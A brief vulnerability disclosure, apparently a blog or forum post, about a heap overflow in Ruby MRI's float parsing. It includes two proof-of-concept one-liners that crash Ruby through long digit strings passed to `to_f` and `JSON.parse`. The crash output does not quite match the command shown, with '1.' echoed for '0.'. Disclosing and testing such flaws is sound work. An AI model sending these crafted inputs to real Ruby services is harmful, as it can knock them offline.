Heap overflow in floating point parsing.

Any time a string is converted to a floating point value, a specially crafted string can cause a heap overflow. This can lead to a denial of service attack via segmentation faults and possibly arbitrary code execution. Any program that converts input of unknown origin to floating point values (especially common when accepting JSON) are vulnerable.

Link to original article

A couple of PoCs (only affecting MRI).

# PoC

$ ruby -e '("0."+"1"*300000).to_f'
[1]    9352 segmentation fault (core dumped)  ruby -e '("1."+"1"*300000).to_f'

irb(main):001:0> require 'json'
=> true
irb(main):002:0> JSON.parse("[0."+"1"*300000+"]").to_f
[1]    9182 segmentation fault (core dumped)  irb

Stanley Tan